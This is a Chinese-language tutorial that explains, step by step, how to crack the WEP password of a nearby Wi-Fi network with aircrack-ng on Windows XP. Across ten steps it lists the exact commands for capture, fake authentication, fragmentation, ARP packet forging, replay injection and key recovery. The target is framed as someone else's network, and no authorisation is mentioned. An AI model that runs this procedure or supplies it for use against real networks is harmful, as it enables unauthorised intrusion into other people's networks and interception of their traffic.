无线破解

开放认证一般不需要合法客户端！但有时候会出现破解不了的情况，如果这个时候有合法客户端出现，而你又正在搜集包的话成功率就100%了！            
什么是开放认证？你在XP无线网卡搜索窗口搜索到了网络，双击连接，如果出现了需要添加密码的对话框，恭喜你，这个网络就是开发式认证的WEP网路！如图：         

         
如果是共享密钥认证方式的WEP网络，会提示你你连接的网络不再服务区的红色对发框，如图：         

         
而你又反复搜索都出现这个网络，提醒下：一个地方如果哦有几个同名的网络出现，比如几个TP-LINK都有，XP下的搜索窗口只会出现一个网路，而且是信号最好的一个网络！            
下面以在XP平台使用aircrack1.0为例：            
群空间有aircrack1.0下载，如果没有向我呼叫！            
解压这个文件放到C:下（主要是方便），最好是以aircrack为文件夹就够了，方便在dos下进度，所以你C:盘下就会出C:\aircrack这个文件夹名称。            
然后你在XP平台运行中输入：cmd，进入DOS提示窗口，如下图：            

            
进入aircrack这个文件夹内，你才可以网站以后的操作！            
下面开始破解步骤：            
1、            
airserv-ng -d "commview.dll|debug"            
这个命令会提示你使用网卡，当然是选择你的网络网卡了（ 提示：支持的网卡就Atheros5004G\5005GS\5006XS等网卡，在使用这个命令前你得把你的网卡装上软件自带的驱动Atheros Driver 4.2.2.104，你的设备管理器里面将看到你的网卡成为了：[CommView]Atheros5004G Wireless Network Adapter等，如果是5005GS当然就出现的是：[CommView]Atheros5005GS Wireless Network Adapter啦～～～～）如图：           

            
选择Y，使用你的网卡！

            
2、            
airodump-ng --channel 6 127.0.0.1:666            
另外打开一个cmd窗口，当然也是像上面一样，进入你的aircrack文件夹里，这个命令是搜索网络，你将在cmd窗口内发现能搜索到的网络，--channel 6 是使用6信道，这个你得自己选择，如果你要破的网络在11信道，那么得改为：airodump-ng --channel 11 127.0.0.1:666，127.0.0.1:666是端口，这个不改变，如果是在BT2下，这个端口就是ath1了，自己想想很简单的！如图：         

         

3、         
aireplay-ng -1 0 -e hai -a 00:1C:F0:4B:9D:48 -h 00:11:22:33:44:55 127.0.0.1:666         
hai 是网络名称！         
00:1C:F0:4B:9D:48 是他的mac地址！         
00:11:22:33:44:55 是你网卡的mac地址！         
另外打开一个cmd窗口，进入你的aircrack文件夹里！        
如图：         

         
只有连接成功以后才可以下面继续破解步骤，这步如果连接不成功， 就不用接着破解了！         

4、         
aireplay-ng -5 -b 00:1C:F0:4B:9D:48 -h 00:11:22:33:44:55 127.0.0.1:666         
另外打开一个cmd窗口，进入你的aircrack文件夹里！这个是抓包，生成虚假认证！         
如图：        

        

5、        
packetforge-ng -0 -a 00:1C:F0:4B:9D:48 -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0131-165326.xor -w arp        
另外打开一个cmd窗口，进入你的aircrack文件夹里！这个是生产注入攻击的步骤！有了前面的xor文件后生产 arp这个文件！        
如图：        

        

6、aireplay-ng -2 -r arp 127.0.0.1:666        
另外打开一个cmd窗口，进入你的aircrack文件夹里！        
攻击开始～～～～～～        
如图：        

        
packets...前面的数字会不停的增长！        
7、airodump-ng -c 6 --bssid 00:1C:F0:4B:9D:48 -w capture 127.0.0.1:666        
另外打开一个cmd窗口，进入你的aircrack文件夹里！抓包啦～～～～，其实这部可以在第3步是就可以使用，如果在第3步就开始使用的话，DATA值增长很慢，有可能一直为0，但第6步的命令开始后你就会发现地2不命令中DATA值增长爆快！        
大概收集到25000的包就可以在10～30秒内破解出64位加密的WEP密码了！当然如果是强密码，那么就得收集更多的包！        

8、aircrack-ng -n 64 capture-01.cap        
注意：第7步保存时是capture.cap，但生成的是capture-01.cap！所以破解时输入的是capture-01.cap！！！！！        
如果是128位加密的话，命令变为：aircrack-ng -n 128 capture-01.cap        

9、当出现密码的时候，不如出现：6D:63:2E:6C:69 ,这个密码我们在连接网络的时候就去掉“：”，为：6d632e6c69就可以了！不分大小写的！是10位数，也就是64位加密的wep密码了！  
10、破解成功了当然就是下面的图啦～～～～～  
两个密码是一样的！编码方式不一样！随便你填什么都可以连接，也就是不同的钥匙开一个门而已！  
如图：